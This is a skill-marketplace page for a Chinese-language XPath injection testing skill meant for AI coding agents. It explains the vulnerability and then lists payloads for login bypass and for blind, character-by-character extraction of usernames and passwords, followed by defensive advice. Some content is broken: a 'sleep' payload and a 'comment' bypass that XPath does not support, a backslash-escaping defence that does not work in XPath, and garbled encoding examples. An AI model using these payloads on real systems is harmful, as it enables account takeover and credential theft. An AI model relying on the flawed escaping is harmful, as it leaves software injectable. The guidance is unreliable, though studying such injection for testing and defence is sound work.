skills/xpath-injection-testing/SKILL.md
XPath注入漏洞测试的专业技能和方法论
npx skillsauth add ed1s0nz/cyberstrikeai xpath-injection-testingInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
XPath注入是一种类似于SQL注入的漏洞,利用XPath查询语句的构造缺陷,可能导致信息泄露、认证绕过等。本技能提供XPath注入的检测、利用和防护方法。
应用程序将用户输入直接拼接到XPath查询语句中,未进行充分验证和过滤,导致攻击者可以修改查询逻辑。
危险代码示例:
String xpath = "//user[username='" + username + "' and password='" + password + "']";
XPathExpression expr = xpath.compile(xpath);
NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);
基础查询:
//user[username='admin']
//user[@id='1']
//user[username='admin' and password='pass']
//user[username='admin' or username='user']
常用函数:
text() - 获取文本内容count() - 计数substring() - 子字符串string-length() - 字符串长度contains() - 包含检查常见功能:
测试特殊字符:
' or '1'='1
' or '1'='1' or '
' or 1=1 or '
') or ('1'='1
测试逻辑操作符:
' or '1'='1
' and '1'='2
' or 1=1 or '
基础绕过:
用户名: admin' or '1'='1
密码: anything
查询: //user[username='admin' or '1'='1' and password='anything']
更精确的绕过:
用户名: admin') or ('1'='1
查询: //user[username='admin') or ('1'='1' and password='*']
枚举用户:
' or 1=1 or '
' or '1'='1
') or 1=1 or ('
获取节点数量:
' or count(//user)>0 or '
获取特定节点:
' or substring(//user[1]/username,1,1)='a' or '
方法1:逻辑绕过
输入: admin' or '1'='1
查询: //user[username='admin' or '1'='1' and password='*']
结果: 匹配所有用户
方法2:注释绕过
输入: admin')] | //* | //*[('
查询: //user[username='admin')] | //* | //*[('' and password='*']
方法3:布尔盲注
' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,1,1)='b' or '
枚举所有用户:
' or 1=1 or '
结果: 返回所有用户节点
获取用户名:
' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,2,1)='d' or '
逐步获取每个字符
获取密码:
' or substring(//user[1]/password,1,1)='p' or '
逐步获取密码字符
基于时间的盲注:
' or count(//user[substring(username,1,1)='a'])>0 and sleep(5) or '
基于布尔值的盲注:
' or substring(//user[1]/username,1,1)='a' or '
观察响应差异
URL编码:
' or '1'='1 → %27%20or%20%271%27%3D%271
HTML实体编码:
' → '
" → "
< → <
> → >
使用注释:
' or 1=1 or '
' or '1'='1' or '
使用不同函数:
substring(//user[1]/username,1,1)
substring(//user[position()=1]/username,1,1)
//user[1]/username/text()[1]
在线工具:
from lxml import etree
from lxml.etree import XPath
# 加载XML文档
doc = etree.parse('users.xml')
# 测试注入
xpath_expr = "//user[username='admin' or '1'='1']"
xpath = XPath(xpath_expr)
results = xpath(doc)
print(results)
输入验证
private static final String[] XPATH_ESCAPE_CHARS =
{"'", "\"", "[", "]", "(", ")", "=", ">", "<", " "};
public static String escapeXPath(String input) {
if (input == null) {
return null;
}
StringBuilder sb = new StringBuilder();
for (int i = 0; i < input.length(); i++) {
char c = input.charAt(i);
if (Arrays.asList(XPATH_ESCAPE_CHARS).contains(String.valueOf(c))) {
sb.append("\\");
}
sb.append(c);
}
return sb.toString();
}
参数化查询
// 使用XPath变量
String xpath = "//user[username=$username and password=$password]";
XPathExpression expr = xpath.compile(xpath);
XPathVariableResolver resolver = new MapVariableResolver(
Map.of("username", escapedUsername, "password", escapedPassword));
expr.setXPathVariableResolver(resolver);
白名单验证
// 只允许特定字符
if (!input.matches("^[a-zA-Z0-9@._-]+$")) {
throw new IllegalArgumentException("Invalid input");
}
使用预编译查询
// 预定义查询模板
private static final String LOGIN_QUERY =
"//user[username=$1 and password=$2]";
// 使用参数绑定
最小权限
tools
满配示例技能包:SKILL.md + scripts/、references/、assets/ 等可选目录;验证 Eino skill 与 HTTP 包内路径(仅授权安全测试与教学)。
testing
XXE XML外部实体注入测试的专业技能和方法论
testing
XSS跨站脚本攻击测试的专业技能
testing
漏洞评估的专业技能和方法论